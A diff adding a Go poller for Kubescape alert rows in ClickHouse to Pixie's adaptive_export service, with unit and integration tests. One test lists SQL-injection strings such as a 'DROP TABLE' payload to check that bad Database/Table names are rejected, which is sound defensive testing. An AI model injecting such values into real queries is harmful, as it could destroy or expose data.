/dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go @@ -0,0 +1,290 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package trigger watches forensic_db.kubescape_logs for new rows and +// pushes parsed kubescape.Event values onto a channel. Polls the +// ClickHouse HTTP interface (default 250ms cadence). Operator runs as +// a DaemonSet — each instance polls only its OWN node's rows via +// `WHERE hostname = ''`. +package trigger + +import ( + "bufio" + "bytes" + "context" + "crypto/sha256" + "encoding/hex" + "encoding/json" + "fmt" + "io" + "net/http" + "net/url" + "regexp" + "strconv" + "strings" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" +) + +// Config configures the trigger. PollInterval defaults to 250ms. +// Hostname is REQUIRED — it scopes every poll to a single node. +type Config struct { + Endpoint string + Database string + Table string + Username string + Password string + Hostname string + PollInterval time.Duration + InitialWatermark uint64 +} + +// ClickHouseHTTP polls forensic_db.
over the ClickHouse HTTP +// interface, scoped to a single node. +type ClickHouseHTTP struct { + cfg Config + client *http.Client +} + +// New validates Config and returns a ready trigger. +func New(cfg Config) (*ClickHouseHTTP, error) { + if cfg.Endpoint == "" { + return nil, fmt.Errorf("trigger: empty Endpoint") + } + if cfg.Hostname == "" { + return nil, fmt.Errorf("trigger: empty Hostname (operator must run node-local)") + } + u, err := url.Parse(cfg.Endpoint) + if err != nil { + return nil, fmt.Errorf("trigger: invalid Endpoint %q: %w", cfg.Endpoint, err) + } + if u.Scheme != "http" && u.Scheme != "https" { + return nil, fmt.Errorf("trigger: Endpoint %q must use http or https scheme", cfg.Endpoint) + } + if u.Host == "" { + return nil, fmt.Errorf("trigger: Endpoint %q has empty host", cfg.Endpoint) + } + if cfg.Database == "" { + cfg.Database = "forensic_db" + } + if cfg.Table == "" { + cfg.Table = "kubescape_logs" + } + // Validate Database / Table as plain ClickHouse identifiers + // (alphanumeric + underscore, not starting with a digit) so the + // SELECT in fetchSince cannot be subverted by an attacker-controlled + // Config. Hostname is value-quoted via quoteCH; identifiers cannot + // be parameterised, hence validation here. + if !validIdentifier(cfg.Database) { + return nil, fmt.Errorf("trigger: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database) + } + if !validIdentifier(cfg.Table) { + return nil, fmt.Errorf("trigger: invalid Table identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Table) + } + if cfg.PollInterval <= 0 { + cfg.PollInterval = 250 * time.Millisecond + } + return &ClickHouseHTTP{ + cfg: cfg, + client: &http.Client{Timeout: 5 * time.Second}, + }, nil +} + +// identifierRE accepts plain ClickHouse identifiers — letters, digits, +// underscores; not starting with a digit. Dotted identifiers (e.g. +// "http2_messages.beta") are deliberately rejected here because the +// trigger only ever queries the kubescape ingest table, not a pixie +// observation table. +var identifierRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`) + +func validIdentifier(s string) bool { return identifierRE.MatchString(s) } + +// Subscribe starts the background poll loop. The returned channel +// produces kubescape.Event values until ctx is cancelled, then closes. +func (t *ClickHouseHTTP) Subscribe(ctx context.Context) (<-chan kubescape.Event, error) { + out := make(chan kubescape.Event, 64) + go t.run(ctx, out) + return out, nil +} + +func (t *ClickHouseHTTP) run(ctx context.Context, out chan<- kubescape.Event) { + defer close(out) + // Watermark uses event_time as the cursor PLUS a set of row + // fingerprints already pushed at that exact event_time. This + // closes the race where two kubescape rows share the same + // event_time but the second arrives after our previous poll: the + // query is `event_time >= watermark` (inclusive) and we skip rows + // whose fingerprint we have already seen at the boundary. + watermark := t.cfg.InitialWatermark + seenAtBoundary := map[string]bool{} + ticker := time.NewTicker(t.cfg.PollInterval) + defer ticker.Stop() + + pollOnce := func() { + rows, maxSeen, err := t.fetchSince(ctx, watermark) + if err != nil { + log.WithError(err).Warn("trigger: poll failed") + return + } + nextSeen := map[string]bool{} + for _, row := range rows { + fp := rowFingerprint(row) + if row.EventTime == watermark && seenAtBoundary[fp] { + continue // already pushed in a prior poll at this exact boundary + } + ev, err := kubescape.Extract(row) + if err != nil { + log.WithError(err).Debug("trigger: skip incomplete row") + continue + } + select { + case out <- ev: + case <-ctx.Done(): + return + } + if row.EventTime == maxSeen { + nextSeen[fp] = true + } + } + if maxSeen > watermark { + watermark = maxSeen + seenAtBoundary = nextSeen + } else if maxSeen == watermark { + // no progress this tick — preserve boundary set, optionally extend + for fp := range nextSeen { + seenAtBoundary[fp] = true + } + } + } + + pollOnce() + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + pollOnce() + } + } +} + +// rowFingerprint hashes the row's content so we can dedupe at the +// watermark boundary without trusting kubescape to give us a unique row id. +func rowFingerprint(r kubescape.Row) string { + h := sha256.New() + _, _ = fmt.Fprintf(h, "%d\x00%s\x00%s\x00%s\x00%s", + r.EventTime, r.RuleID, r.Hostname, r.K8sDetails, r.ProcessDetails) + return hex.EncodeToString(h.Sum(nil)) +} + +func (t *ClickHouseHTTP) fetchSince(ctx context.Context, watermark uint64) ([]kubescape.Row, uint64, error) { + q := url.Values{} + q.Set("query", fmt.Sprintf( + "SELECT RuleID, RuntimeK8sDetails, RuntimeProcessDetails, event_time, hostname "+ + "FROM %s.%s "+ + "WHERE hostname = %s AND event_time >= %d "+ + "ORDER BY event_time FORMAT JSONEachRow", + t.cfg.Database, t.cfg.Table, quoteCH(t.cfg.Hostname), watermark)) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, + t.cfg.Endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, 0, err + } + if t.cfg.Username != "" { + req.SetBasicAuth(t.cfg.Username, t.cfg.Password) + } + resp, err := t.client.Do(req) + if err != nil { + return nil, 0, err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return nil, 0, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + return parseJSONEachRow(resp.Body) +} + +// parseJSONEachRow streams JSONEachRow output line-by-line from r. +// Streaming (vs io.ReadAll into a []byte) bounds memory at one row +// regardless of how large the ClickHouse result set is. +// +// Malformed rows are LOGGED + SKIPPED, never fatal: a single bad line +// must not block watermark advancement and re-pin the bad row on every +// subsequent poll. Only an unrecoverable scanner error (e.g. line +// exceeds the 16 MiB buffer) fails the call. +func parseJSONEachRow(r io.Reader) ([]kubescape.Row, uint64, error) { + type rawRow struct { + RuleID string `json:"RuleID"` + RuntimeK8sDetails string `json:"RuntimeK8sDetails"` + RuntimeProcessDetails string `json:"RuntimeProcessDetails"` + EventTime json.RawMessage `json:"event_time"` + Hostname string `json:"hostname"` + } + var ( + rows []kubescape.Row + maxSeen uint64 + ) + scanner := bufio.NewScanner(r) + scanner.Buffer(make([]byte, 1<<20), 1<<24) + for scanner.Scan() { + line := bytes.TrimSpace(scanner.Bytes()) + if len(line) == 0 { + continue + } + var rr rawRow + if err := json.Unmarshal(line, &rr); err != nil { + log.WithError(err).Debug("trigger: skip malformed JSON row") + continue + } + ev, err := parseUint64Loose(rr.EventTime) + if err != nil { + log.WithError(err).Debug("trigger: skip row with bad event_time") + continue + } + rows = append(rows, kubescape.Row{ + EventTime: ev, + RuleID: rr.RuleID, + Hostname: rr.Hostname, + K8sDetails: rr.RuntimeK8sDetails, + ProcessDetails: rr.RuntimeProcessDetails, + }) + if ev > maxSeen { + maxSeen = ev + } + } + if err := scanner.Err(); err != nil { + return nil, 0, err + } + return rows, maxSeen, nil +} + +func parseUint64Loose(raw json.RawMessage) (uint64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + return strconv.ParseUint(s, 10, 64) +} + +// chLiteralEscaper — hoisted to a package-level var so we don't allocate +// a Replacer per call (quoteCH is hot in rowFingerprint). +var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`) + +func quoteCH(s string) string { + return "'" + chLiteralEscaper.Replace(s) + "'" +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go new file mode 100644 index 00000000000..1ea1bd5771a --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go @@ -0,0 +1,241 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "context" + "net/http" + "net/http/httptest" + "strings" + "sync/atomic" + "testing" + "time" +) + +const canonicalRowJSON = `{"RuleID":"R1005","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":106040,\"comm\":\"redis-server\"}}","event_time":"1744477360303026359","hostname":"node-1"}` + +// TestTrigger_Polls_HostnameAndWatermark — query carries +// WHERE hostname=… AND event_time>=… . Race-free: the server pushes +// each query string into a buffered channel; the test waits for the +// SECOND request deterministically (no fixed sleep, no shared +// non-atomic variable). +func TestTrigger_Polls_HostnameAndWatermark(t *testing.T) { + queries := make(chan string, 8) + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + queries <- r.URL.Query().Get("query") + if n == 1 { + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + return + } + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + tr, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + if err != nil { + t.Fatalf("New: %v", err) + } + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Pod != "redis-578d5dc9bd-kjj78" { + t.Fatalf("Pod = %q", ev.Target.Pod) + } + if ev.Target.PID != 106040 { + t.Fatalf("PID = %d", ev.Target.PID) + } + if ev.Hostname != "node-1" { + t.Fatalf("Hostname = %q", ev.Hostname) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first event") + } + // Drain the first query, then wait for the second (advanced + // watermark) — channel-based, so no fixed sleep races. + <-queries + var lastQuery string + select { + case lastQuery = <-queries: + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for second poll") + } + if !strings.Contains(lastQuery, "hostname = 'node-1'") { + t.Fatalf("query missing hostname filter: %q", lastQuery) + } + if !strings.Contains(lastQuery, "event_time >= 1744477360303026359") { + t.Fatalf("watermark didn't advance to inclusive boundary: %q", lastQuery) + } +} + +// TestTrigger_RequiresHostname — defensive: refuses empty hostname. +func TestTrigger_RequiresHostname(t *testing.T) { + if _, err := New(Config{Endpoint: "http://x", Hostname: ""}); err == nil { + t.Fatalf("empty Hostname not rejected") + } +} + +// TestTrigger_ContextCancellationClosesChannel — clean shutdown. +func TestTrigger_ContextCancellationClosesChannel(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + ch, _ := tr.Subscribe(ctx) + cancel() + select { + case _, ok := <-ch: + if ok { + t.Fatalf("channel produced after cancel") + } + case <-time.After(300 * time.Millisecond): + t.Fatalf("channel not closed within 300ms of cancel") + } +} + +// TestTrigger_HTTPErrorContinues — transient 5xx → retry, system stable. +func TestTrigger_HTTPErrorContinues(t *testing.T) { + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + if n == 1 { + w.WriteHeader(503) + return + } + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + })) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Comm == "" { + t.Fatalf("got empty Target after recovery") + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("trigger did not recover from transient HTTP 503") + } +} + +// TestTrigger_DedupesAtWatermarkBoundary — same-event_time rows that +// arrive in a later poll than they were already observed must NOT be +// re-emitted. Distinct rows at the same boundary timestamp must still +// be emitted (only the duplicate is suppressed). +func TestTrigger_DedupesAtWatermarkBoundary(t *testing.T) { + const distinctRowJSON = `{"RuleID":"R0006","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":222222,\"comm\":\"redis-cli\"}}","event_time":"1744477360303026359","hostname":"node-1"}` + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + switch n { + case 1: + // First poll emits the canonical row. + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + case 2: + // Second poll: server "re-discovers" the SAME row at the + // boundary timestamp PLUS one DISTINCT row at the same + // event_time. The trigger must suppress the duplicate + // fingerprint and pass through the distinct one. + _, _ = w.Write([]byte(canonicalRowJSON + "\n" + distinctRowJSON + "\n")) + default: + _, _ = w.Write([]byte("")) + } + })) + defer srv.Close() + + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + + // Collect events for ~250 ms — long enough for at least 3 polls. + deadline := time.Now().Add(250 * time.Millisecond) + var got []uint64 // PIDs we observed + for time.Now().Before(deadline) { + select { + case ev := <-ch: + got = append(got, ev.Target.PID) + case <-time.After(20 * time.Millisecond): + } + } + // Expect exactly 2 events: PID 106040 (canonical, emitted once + // even though server returned it twice) and PID 222222 (distinct + // row at same boundary, emitted exactly once). + if len(got) != 2 { + t.Fatalf("got %d events, want 2 (canonical + distinct, no dup); pids=%v", len(got), got) + } + canonicalSeen, distinctSeen := 0, 0 + for _, pid := range got { + switch pid { + case 106040: + canonicalSeen++ + case 222222: + distinctSeen++ + } + } + if canonicalSeen != 1 { + t.Fatalf("canonical row emitted %dx, want 1 (dedup failed)", canonicalSeen) + } + if distinctSeen != 1 { + t.Fatalf("distinct same-event_time row emitted %dx, want 1 (over-aggressive dedup)", distinctSeen) + } +} + +// TestTrigger_RejectsInvalidIdentifiers — defensive: SQL injection via +// Database/Table config is refused at construction time. +func TestTrigger_RejectsInvalidIdentifiers(t *testing.T) { + for _, bad := range []string{ + "forensic_db; DROP TABLE alerts", + "db with space", + "123starts_with_digit", + "backtick`injection", + "forensic_db.kubescape_logs", // dotted not allowed for this table param + } { + _, err := New(Config{Endpoint: "http://x", Hostname: "node-1", Database: bad}) + if err == nil { + t.Errorf("New accepted bad Database %q; expected error", bad) + } + _, err = New(Config{Endpoint: "http://x", Hostname: "node-1", Table: bad}) + if err == nil { + t.Errorf("New accepted bad Table %q; expected error", bad) + } + } +} + +// TestTrigger_BadRowSkipped — incomplete kubescape row is skipped, good rows still arrive. +func TestTrigger_BadRowSkipped(t *testing.T) { + bad := `{"RuleID":"","RuntimeK8sDetails":"","RuntimeProcessDetails":"","event_time":"1","hostname":"node-1"}` + "\n" + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = w.Write([]byte(bad + canonicalRowJSON + "\n")) + })) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Comm != "redis-server" { + t.Fatalf("got Comm %q; bad row leaked through", ev.Target.Comm) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("good row not received after bad-row skip") + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/integration_test.go b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go new file mode 100644 index 00000000000..c8a42f73575 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go @@ -0,0 +1,149 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package trigger_test + +import ( + "context" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// Live integration test for the trigger's poll loop. Inserts a +// kubescape_logs row directly via HTTP, then asserts the trigger +// surfaces it as a kubescape.Event before the deadline. + +func env(t *testing.T) (endpoint, user, pass string) { + t.Helper() + endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT") + if endpoint == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func ensureSchema(t *testing.T, endpoint, user, pass string) { + t.Helper() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } +} + +// insertKubescapeRow shoves one synthetic row into kubescape_logs via +// JSONEachRow on the HTTP interface — same shape Vector emits. +func insertKubescapeRow(t *testing.T, endpoint, user, pass, hostname, ruleID string, eventTime uint64) { + t.Helper() + body := fmt.Sprintf( + `{"BaseRuntimeMetadata":"{\"alertName\":\"%s\"}","CloudMetadata":"","RuleID":"%s","RuntimeK8sDetails":"{\"podName\":\"redis-test\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1234,\"comm\":\"redis-server\"}}","event":"","event_time":%d,"hostname":"%s"}`, + ruleID, ruleID, eventTime, hostname, + ) + q := url.Values{} + q.Set("query", "INSERT INTO forensic_db.kubescape_logs FORMAT JSONEachRow") + req, err := http.NewRequest(http.MethodPost, + strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), + strings.NewReader(body)) + if err != nil { + t.Fatal(err) + } + req.Header.Set("Content-Type", "application/x-ndjson") + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("seed insert: %v", err) + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + buf, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + t.Fatalf("seed insert HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(buf))) + } +} + +// TestTriggerSubscribe_Live: insert one row, expect one Event from the +// trigger's Subscribe channel within the deadline. +func TestTriggerSubscribe_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + hostname := fmt.Sprintf("aw-trig-%d", time.Now().UnixNano()) + now := time.Now() + eventTime := uint64(now.UnixNano()) + + // Use a watermark slightly before the synthetic event_time so the + // first poll picks up exactly our row, regardless of unrelated rows + // in the table from earlier runs. + cfg := trigger.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + Hostname: hostname, + PollInterval: 200 * time.Millisecond, + InitialWatermark: eventTime - 1, + } + trg, err := trigger.New(cfg) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + + ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) + defer cancel() + ch, err := trg.Subscribe(ctx) + if err != nil { + t.Fatalf("Subscribe: %v", err) + } + + insertKubescapeRow(t, endpoint, user, pass, hostname, "R1005", eventTime) + + select { + case ev, ok := <-ch: + if !ok { + t.Fatalf("channel closed before event arrived") + } + if ev.RuleID != "R1005" { + t.Errorf("Event.RuleID = %q, want R1005", ev.RuleID) + } + if ev.Hostname != hostname { + t.Errorf("Event.Hostname = %q, want %q", ev.Hostname, hostname) + } + if ev.EventTime != eventTime { + t.Errorf("Event.EventTime = %d, want %d", ev.EventTime, eventTime) + } + if ev.Target.Pod != "redis-test" || ev.Target.Namespace != "redis" { + t.Errorf("Event.Target = %+v, want pod=redis-test, ns=redis", ev.Target) + } + case <-ctx.Done(): + t.Fatalf("trigger did not surface the seeded row within 15s") + } +}